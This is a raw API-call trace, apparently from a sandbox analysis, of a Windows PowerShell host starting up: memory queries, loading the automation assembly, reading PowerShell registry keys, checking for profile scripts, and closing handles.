	[0330.237] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.238] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.239] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.239] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.239] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.239] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.239] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.872] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.872] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.873] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.874] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.877] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0330.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.877] CoTaskMemFree (pv=0xed700) 
	[0330.880] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0330.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.880] CoTaskMemFree (pv=0xed700) 
	[0330.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.438] VirtualQuery (in: lpAddress=0x28b8e0, lpBuffer=0x28c7a0, dwLength=0x30 | out: lpBuffer=0x28c7a0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0331.439] VirtualQuery (in: lpAddress=0x28b8e0, lpBuffer=0x28c7a0, dwLength=0x30 | out: lpBuffer=0x28c7a0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.439] VirtualQuery (in: lpAddress=0x28b130, lpBuffer=0x28bff0, dwLength=0x30 | out: lpBuffer=0x28bff0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.439] VirtualQuery (in: lpAddress=0x28b130, lpBuffer=0x28bff0, dwLength=0x30 | out: lpBuffer=0x28bff0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0331.441] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d738 | out: phkResult=0x28d738*=0x398) returned 0x0
	[0331.441] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6bc, lpData=0x0, lpcbData=0x28d6b8*=0x0 | out: lpType=0x28d6bc*=0x1, lpData=0x0, lpcbData=0x28d6b8*=0x56) returned 0x0
	[0331.441] CoTaskMemAlloc (cb=0x5a) returned 0x1b81faa0
	[0331.441] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d68c, lpData=0x1b81faa0, lpcbData=0x28d688*=0x56 | out: lpType=0x28d68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d688*=0x56) returned 0x0
	[0331.441] CoTaskMemFree (pv=0x1b81faa0) 
	[0331.441] RegCloseKey (hKey=0x398) returned 0x0
	[0331.442] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d738 | out: phkResult=0x28d738*=0x398) returned 0x0
	[0331.442] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d6bc, lpData=0x0, lpcbData=0x28d6b8*=0x0 | out: lpType=0x28d6bc*=0x1, lpData=0x0, lpcbData=0x28d6b8*=0x56) returned 0x0
	[0331.442] CoTaskMemAlloc (cb=0x5a) returned 0x1b81faa0
	[0331.442] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d68c, lpData=0x1b81faa0, lpcbData=0x28d688*=0x56 | out: lpType=0x28d68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d688*=0x56) returned 0x0
	[0331.442] CoTaskMemFree (pv=0x1b81faa0) 
	[0331.442] RegCloseKey (hKey=0x398) returned 0x0
	[0331.442] CoTaskMemAlloc (cb=0x20c) returned 0xa5260
	[0331.442] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xa5260 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0331.443] CoTaskMemFree (pv=0xa5260) 
	[0331.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0331.443] CoTaskMemAlloc (cb=0x20c) returned 0xa5260
	[0331.443] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xa5260 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0331.443] CoTaskMemFree (pv=0xa5260) 
	[0331.443] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0331.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0331.446] SetErrorMode (uMode=0x1) returned 0x1
	[0331.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d6a0 | out: lpFileInformation=0x28d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0331.446] SetErrorMode (uMode=0x1) returned 0x1
	[0331.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0331.446] SetErrorMode (uMode=0x1) returned 0x1
	[0331.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d6a0 | out: lpFileInformation=0x28d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0331.446] SetErrorMode (uMode=0x1) returned 0x1
	[0331.447] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0331.447] SetErrorMode (uMode=0x1) returned 0x1
	[0331.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d6a0 | out: lpFileInformation=0x28d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0331.447] SetErrorMode (uMode=0x1) returned 0x1
	[0331.447] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0331.447] SetErrorMode (uMode=0x1) returned 0x1
	[0331.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28d6a0 | out: lpFileInformation=0x28d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0331.447] SetErrorMode (uMode=0x1) returned 0x1
	[0331.450] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0331.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.450] CoTaskMemFree (pv=0xed700) 
	[0331.451] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0331.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.451] CoTaskMemFree (pv=0xed700) 
	[0331.454] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0331.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.454] CoTaskMemFree (pv=0xed700) 
	[0332.241] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0332.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.241] CoTaskMemFree (pv=0xed700) 
	[0332.246] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0332.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.246] CoTaskMemFree (pv=0xed700) 
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b0
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0332.248] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0332.249] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0332.249] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0332.249] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0332.251] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0332.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.251] CoTaskMemFree (pv=0xed700) 
	[0332.253] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0332.254] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x28d880 | out: lpMode=0x28d880) returned 1
	[0332.254] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0332.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.254] CoTaskMemFree (pv=0xed700) 
	[0332.258] SetEvent (hEvent=0x39c) returned 1
	[0332.258] SetEvent (hEvent=0x398) returned 1
	[0332.258] SetEvent (hEvent=0x3b0) returned 1
	[0332.258] SetEvent (hEvent=0x378) returned 1
	[0332.258] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0332.260] CoTaskMemAlloc (cb=0x104) returned 0xed700
	[0332.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed700, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.260] CoTaskMemFree (pv=0xed700) 
	[0332.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d5d8 | out: phkResult=0x28d5d8*=0x344) returned 0x0
	[0332.261] RegQueryValueExW (in: hKey=0x344, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x28d55c, lpData=0x0, lpcbData=0x28d558*=0x0 | out: lpType=0x28d55c*=0x0, lpData=0x0, lpcbData=0x28d558*=0x0) returned 0x2

Thread:
	id = 118
	os_tid = 0x6ac


Thread:
	id = 121
	os_tid = 0x53c


Thread:
	id = 130
	os_tid = 0xa78


Thread:
	id = 146
	os_tid = 0xb2c


Thread:
	id = 147
	os_tid = 0xb30

	[0268.446] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0311.848] LocalFree (hMem=0xb7290) returned 0x0
	[0311.848] RegCloseKey (hKey=0x330) returned 0x0
	[0311.848] LocalFree (hMem=0xb72c0) returned 0x0
	[0311.848] CloseHandle (hObject=0x1d0) returned 1
	[0311.848] CloseHandle (hObject=0x13) returned 1
	[0311.849] CloseHandle (hObject=0xf) returned 1
	[0311.849] RegCloseKey (hKey=0x30c) returned 0x0
	[0311.850] RegCloseKey (hKey=0x308) returned 0x0
	[0311.850] RegCloseKey (hKey=0x304) returned 0x0
	[0316.767] RegCloseKey (hKey=0x304) returned 0x0
	[0320.965] RegCloseKey (hKey=0x390) returned 0x0
	[0320.965] RegCloseKey (hKey=0x38c) returned 0x0
	[0320.965] RegCloseKey (hKey=0x388) returned 0x0
	[0320.966] RegCloseKey (hKey=0x384) returned 0x0
	[0320.966] RegCloseKey (hKey=0x380) returned 0x0
	[0320.966] RegCloseKey (hKey=0x37c) returned 0x0
	[0320.966] RegCloseKey (hKey=0x354) returned 0x0
	[0320.967] RegCloseKey (hKey=0x3ac) returned 0x0
	[0320.967] RegCloseKey (hKey=0x374) returned 0x0
	[0320.967] RegCloseKey (hKey=0x370) returned 0x0
	[0320.967] RegCloseKey (hKey=0x36c) returned 0x0
	[0320.968] RegCloseKey (hKey=0x368) returned 0x0
	[0320.968] RegCloseKey (hKey=0x364) returned 0x0
	[0320.968] RegCloseKey (hKey=0x360) returned 0x0
	[0320.968] RegCloseKey (hKey=0x35c) returned 0x0
	[0320.968] RegCloseKey (hKey=0x358) returned 0x0
	[0320.969] RegCloseKey (hKey=0x3a8) returned 0x0
	[0320.969] RegCloseKey (hKey=0x3a4) returned 0x0
	[0320.969] RegCloseKey (hKey=0x348) returned 0x0
	[0320.969] RegCloseKey (hKey=0x344) returned 0x0
	[0320.970] RegCloseKey (hKey=0x340) returned 0x0
	[0320.970] RegCloseKey (hKey=0x33c) returned 0x0
	[0320.970] RegCloseKey (hKey=0x338) returned 0x0
	[0320.970] RegCloseKey (hKey=0x334) returned 0x0
	[0320.970] RegCloseKey (hKey=0x330) returned 0x0
	[0320.971] RegCloseKey (hKey=0x1d0) returned 0x0
